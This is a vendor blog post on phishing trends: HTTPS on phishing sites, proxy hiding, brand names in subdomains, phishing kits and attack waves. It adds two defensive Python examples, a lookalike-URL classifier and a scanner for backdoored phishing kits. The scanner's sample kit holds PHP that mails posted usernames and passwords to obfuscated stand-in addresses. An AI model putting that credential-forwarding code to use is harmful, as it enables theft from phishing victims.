As we dive into 2019, customer-facing phishing remains one of the top cybersecurity threats. In our battles to combat these, we’ve noticed certain trends that are making phishing attacks much harder to detect and stop. Last year, Segasec anti-phishing experts encountered (and thwarted I might add) some pretty devious phishing tactics. Here are the top five phishing trends that have gained momentum and show no signs of abating.
Cybercriminals use HTTPS protocol to “secure” their phishing sites
Ever on the lookout for better ways to fool users into handing over personal information and online credentials, threat actors are “going legit” by obtaining valid HTTPS certificates and using TLS encryption to make their phishing sites “secure.”
HTTPS (Hypertext Transfer Protocol Secure) is HTTP carried over TLS (Transport Layer Security, the successor to SSL, Secure Sockets Layer). It does make the connection secure: traffic between the browser and the server is encrypted and protected from tampering in transit, and the certificate ties that connection to the domain name shown in the address bar. It says nothing about whether the operator of that domain is malicious. According to APWG’s latest Phishing Activity Trends Report, “half of all phishing attacks are now hosted on websites that had HTTPS and SSL certificates.” It’s a sneaky and smart tactic, and it works: when site visitors see the little green padlock in the browser URL bar, they assume it’s safe to communicate and transact with the site.
With this tactic, counterfeit phishing sites not only look and act like the brand they are mimicking, they also satisfy the very security indicator users have been taught to rely on for safe browsing. It’s no wonder so many users continue to get phished!
What do security certificates actually mean?
An informal Twitter poll by security guru Troy Hunt revealed that most ordinary, non-tech users do not know about HTTPS and SSL certificates. Of those that do, 37% look for the green padlock, which any certificate produces, including a Domain Validation (DV) certificate, for security assurance. That’s a good start, but of all the SSL certificate types, DV is the weakest. It verifies only that the applicant controls the domain name, typically by answering an automated DNS or HTTP challenge. That’s it. A DV cert does not reveal the site owner’s name, organization or country. That’s why DV certificates are such good leverage for threat actors: the phishing site looks legit and secure while the owner’s true identity stays hidden.
To build their phishing infrastructure, we’ve noticed that cybercriminals like to buy domains from a few specific sources. (The names of these sources were withheld by the editor in order to avoid public shaming.) Moreover, some certificate authorities issue free DV SSL certificates in return for very little information beyond proof of domain control, which almost guarantees continued and even increased abuse by phishers.
An Extended Validation (EV) SSL certificate, on the other hand, requires a much more rigorous verification process in which the applicant must prove the legal identity of the organization as well as its exclusive right to use and operate the domain. The organization’s name and country are embedded in the certificate and displayed directly in the browser’s address bar. Unfortunately, according to Hunt’s poll, only 4% of users look for an EV cert, and threat actors know it. A basic veneer of security is all that is needed to fool most people.
Cybercriminals hide phishing sites behind proxies
Another phenomenon we noticed in 2018 is that hackers often place their phishing sites behind global network and CDN providers, routing all of the phishing traffic through the provider’s reverse proxy so that the real hosting provider is masked. Some of these CDN providers even issue SSL certificates for the proxied hostname, so the site appears totally legit. Even when a malicious site is detected and verified by someone like Segasec, the proxy setup buys the attacker time to keep phishing before the site is blocked or taken down.
In our experience and to their credit, most of these global network and CDN providers react very fast when it comes to requests to take down malicious sites. With their cooperation, it can be done pretty quickly – often in less than an hour. Bear in mind that taking down any website is not a trivial matter. Hosting providers and domain registrars have to be 100% sure of foul play before they are willing to disable a working website. That’s why we continue to perfect Segasec technologies for early detection of phishing infrastructure and pre-emptive takedown. So far, we’ve had zero false positives and that’s important to building effective anti-phishing partnerships.
Do hosting providers abet phishing?
Even with all the proof, some hosting providers are not so responsive to requests to take down phishing sites. You might even call them “hacker friendly” hosting providers. But all is not lost. When we encounter “takedown aversion” we leverage other tools like Google Safe Browsing, Microsoft Defender or other anti-virus software to disable communication with a malicious site. Partnerships play such an important role here, enabling us to immediately notify most browsers about a new phishing URL so they can flag it and notify their users.
We also maintain our own database of phishing sites called Zelda*. Anyone (including AV vendors) can download the Zelda anti-phishing extension (for Chrome or Firefox) for their browser, and they’ll be protected from all phishing scams that Segasec finds.
(*Zelda anti-phishing is an open source project. You can access it here)
Phishing sites hide behind subdomains
Throughout 2018 we saw increased use of free dynamic DNS services, with phishers hiding behind subdomains of the providers’ zones. While some of these DNS services claim to have a very strict abuse policy to keep their domains free of malicious activity, abuse still occurs rather frequently. Policing it completely is impossible.
The use of subdomains, and of second-level subdomains, is quite prevalent in attacks on the banking industry. It starts with a phishing email that sends you to a site whose URL might look like this: “https://www.bank-name.com.some-other-domain.com”. Everything to the left of the registered domain (here some-other-domain.com) is chosen freely by whoever controls it, so the bank’s name can simply be placed in front as a subdomain. Hackers obtain the domain for free, so they don’t have to use credit cards, making it very hard to trace back an attacker. Then they use prebuilt kits to create an unlimited number of subdomains for their phishing sites, and they can do it in a matter of minutes. Bank customers who aren’t paying attention will see the bank name, think it’s legit, and hand over their credentials. It’s prevalent because it works. That’s why you need to disarm these phishers preemptively, before the attack launches.
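To see why the bank’s name in such a hostname proves nothing, here is an added example (not code from the original post or from Segasec) that extracts the registrable domain from a URL and flags any host that mentions a protected brand somewhere the brand does not own. It assumes a small, constructed stub of the Public Suffix List, fictitious brand domains (bank-name.com, bank-name.co.uk) and a hypothetical dynamic-DNS zone (dyndns-example.org); real code should load the full list. It goes one step beyond the URL quoted above by also treating a brand label registered under a dynamic-DNS zone as suspicious.

```python
from urllib.parse import urlsplit

# Constructed stub of the Public Suffix List (https://publicsuffix.org/list/):
# only the entries the sample URLs below need. Production code should load
# the full list (for example through the `tldextract` package), because the
# whole check depends on knowing where the registrable domain starts.
PUBLIC_SUFFIXES = {
    "com", "net", "org", "co.uk",
    # Free dynamic-DNS operators register their zones as public suffixes, so
    # each customer label counts as its own site. Hypothetical provider name.
    "dyndns-example.org",
}

# The brand's real registrable domains and the label(s) phishers imitate.
# Both are assumptions for the example, not real registrations.
BRAND_DOMAINS = {"bank-name.com", "bank-name.co.uk"}
BRAND_LABELS = {"bank-name", "bankname"}


def split_host(hostname):
    """Return (subdomain_labels, registrable_domain, public_suffix).

    Tries successively shorter suffixes from the left, so the first hit is the
    longest public suffix. The label immediately left of it forms the
    registrable domain (eTLD+1); anything further left is chosen freely by
    whoever controls that domain.
    """
    labels = hostname.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            if i == 0:                      # hostname is itself a public suffix
                return [], "", ".".join(labels)
            return labels[: i - 1], ".".join(labels[i - 1:]), ".".join(labels[i:])
    # Unknown suffix (intranet name, typo TLD): treat the whole host as registrable.
    return [], ".".join(labels), ""


def classify_url(url):
    """Decide whether a URL is on the brand's own domain, mimics the brand
    somewhere it does not own, or is unrelated to the brand."""
    host = urlsplit(url).hostname or ""
    subdomains, registrable, suffix = split_host(host)
    registrable_label = registrable.split(".")[0] if registrable else ""
    # Only the registrable domain itself proves ownership; a brand name in
    # any other label is free for the attacker to choose.
    if registrable in BRAND_DOMAINS:
        verdict = "brand-owned"
    elif any(b in label for b in BRAND_LABELS
             for label in subdomains + [registrable_label]):
        verdict = "suspicious"
    else:
        verdict = "unrelated"
    return {"host": host, "subdomains": subdomains, "registrable": registrable,
            "suffix": suffix, "verdict": verdict}


if __name__ == "__main__":
    # Constructed sample URLs, modelled on the pattern quoted in the text.
    for u in [
        "https://www.bank-name.com/login",
        "https://www.bank-name.com.some-other-domain.com/login",
        "https://bank-name.dyndns-example.org/verify",
        "https://news.example.net/",
    ]:
        r = classify_url(u)
        print(f"{r['verdict']:12} registrable={r['registrable']:32} "
              f"subdomains={r['subdomains']}  {u}")
```

The substring match on brand labels is deliberately loose (it also catches “secure-bank-name”), which suits triage of newly registered hosts; tighten it before using the verdict to block anything automatically.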
Cyber criminals are using pre-built Phishing Kits
Phishing kits have come a long way since their emergence in 2007. Typically, the kit is delivered as a zip file containing all the HTML/PHP templates, scripts, and images needed to stand up a fully operational phishing site. You no longer have to be a techno-nerd to use one. In 2018, we noticed that the use of prebuilt phish kits is on the rise (possibly in tandem with the use of subdomains). “Phish kits” can be purchased on the dark web for as little as a few dollars, but they are also distributed for free via social networks and hacker forums. Often, the free kits contain a “backdoor” in the code that silently copies and forwards all the harvested campaign data to the kit author, for example through an extra, obfuscated recipient address in the script that mails out the stolen credentials. The kit user is not savvy enough to detect the backdoor. This puts phishing victims in double jeopardy: once from the phish kit user and again from the phish kit author!
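As an added example (not part of the original post, and not a tool or kit Segasec published), here is a small static scanner for the backdoor pattern described above: it walks a kit’s PHP files, statically evaluates the recipient of each mail() call (following simple variables, string concatenation, base64_decode() and str_rot13()) and reports any address the operator never configured. The two-file kit it scans is constructed inline with fictitious addresses; the patterns cover the obfuscations seen most often, not arbitrary PHP.

```python
import base64
import codecs
import os
import re
import tempfile

# Patterns this scanner evaluates statically. Kits vary, so these cover the
# obfuscations seen most often, not arbitrary PHP.
MAIL_CALL = re.compile(r"""\bmail\s*\(\s*(?P<to>(?:'[^']*'|"[^"]*"|[^,'"])+?)\s*,""", re.I)
ASSIGN = re.compile(r"(?P<var>\$\w+)\s*=\s*(?P<expr>[^;]+);")
STRING_LIT = re.compile(r"""^(['"])(?P<s>[^'"]*)\1$""")
DECODER = re.compile(
    r"""^(?P<fn>base64_decode|str_rot13)\s*\(\s*(['"])(?P<s>[^'"]*)\2\s*\)$""", re.I)
CONCAT = re.compile(r"""\s*\.\s*(?=(?:[^'"]*['"][^'"]*['"])*[^'"]*$)""")  # '.' outside quotes
EMAIL = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")


def resolve(expr, assignments, depth=0):
    """Evaluate a PHP recipient expression into (text, obfuscated) segments,
    following simple variables, string literals, concatenation and the two
    decoders. Anything only known at runtime ($_POST, ...) yields nothing."""
    expr = expr.strip()
    if depth > 8:                      # guard against self-referencing assignments
        return []
    parts = CONCAT.split(expr)
    if len(parts) > 1:
        return [seg for p in parts for seg in resolve(p, assignments, depth + 1)]
    if expr in assignments:
        return resolve(assignments[expr], assignments, depth + 1)
    m = STRING_LIT.match(expr)
    if m:
        return [(m["s"], False)]
    m = DECODER.match(expr)
    if m and m["fn"].lower() == "base64_decode":
        try:
            return [(base64.b64decode(m["s"]).decode("utf-8", "replace"), True)]
        except ValueError:             # binascii.Error is a ValueError
            return []
    if m:
        return [(codecs.decode(m["s"], "rot_13"), True)]
    return []


def scan_kit(root, operator_addresses):
    """Report every statically visible mail() recipient in a kit directory,
    marking those decoded from obfuscated code and those the operator never
    configured (the kit author's copy of the loot)."""
    sources = {}
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            if name.lower().endswith((".php", ".inc")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    sources[os.path.relpath(path, root)] = fh.read()
    # Kits are small and include each other freely: treat all assignments
    # as one scope so $to defined in config.php resolves inside send.php.
    assignments = {m["var"]: m["expr"]
                   for src in sources.values() for m in ASSIGN.finditer(src)}
    declared = {a.lower() for a in operator_addresses}
    findings = []
    for rel, src in sources.items():
        for m in MAIL_CALL.finditer(src):
            segments = resolve(m["to"], assignments)
            hidden = {a for text, obf in segments if obf for a in EMAIL.findall(text)}
            line = src.count("\n", 0, m.start()) + 1
            for addr in EMAIL.findall("".join(text for text, _ in segments)):
                findings.append({"file": rel, "line": line, "recipient": addr,
                                 "obfuscated": addr in hidden,
                                 "undeclared": addr.lower() not in declared})
    return findings


def build_sample_kit(root):
    """Write a constructed two-file kit with fictitious addresses: the
    operator's config plus a sender script carrying two hidden recipients."""
    hidden_b64 = base64.b64encode(b"kitauthor@example.org").decode()
    hidden_rot = codecs.encode("backdoor@example.com", "rot_13")
    with open(os.path.join(root, "config.php"), "w") as fh:
        fh.write('<?php\n$to = "operator@example.net";\n')
    with open(os.path.join(root, "send.php"), "w") as fh:
        fh.write('<?php\ninclude "config.php";\n'
                 '$msg = "user=" . $_POST["user"] . "&pass=" . $_POST["pass"];\n'
                 'mail($to, "Login", $msg);\n'
                 '// "anti-bot" helper that shipped with the free download:\n'
                 f'mail(base64_decode("{hidden_b64}"), "Login", $msg);\n'
                 f'mail($to . ", " . str_rot13("{hidden_rot}"), "Login", $msg);\n')


def demo():
    """Build the sample kit in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_kit(tmp)
        return scan_kit(tmp, {"operator@example.net"})


if __name__ == "__main__":
    for f in demo():
        flag = "HIDDEN " if f["obfuscated"] else "       "
        note = "UNDECLARED" if f["undeclared"] else "declared"
        print(f'{f["file"]}:{f["line"]} {flag}{f["recipient"]:28} {note}')
```

A real kit may build the recipient at runtime (eval(), gzinflate(), string functions on $_SERVER values), which this static pass cannot follow; a mail() call whose recipient resolves to nothing is itself worth a manual look.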
Phishing comes in waves
While each phishing attack may seem like a unique event, most phishing campaigns use the same basic tactics and techniques. The phish kits mentioned above are an extreme example of this commonality. But even very skilled phishers will use the same attack tactics against different targets. For example, in 2018, we saw waves of phishing attacks against the banking industry. The first wave targeted one bank. As soon as the first wave subsided, another attack was launched against a different bank, followed by a third wave, and so on. Segasec AI machine learning uses this data to identify attack patterns so when subsequent waves of attacks are detected, we are ready for pre-emptive takedown.
Outlook for 2019: Get smart or get phished
Since Segasec AI models focus exclusively on phishing, our solution gets smarter with every phishing event that we detect and monitor on the web. I wish I could say the same about users but unfortunately, people continue to be fooled by devious phishers. Organizations who adopt an intelligent and pre-emptive anti-phishing posture can more effectively protect their brand reputation and their customers from phishing abuse.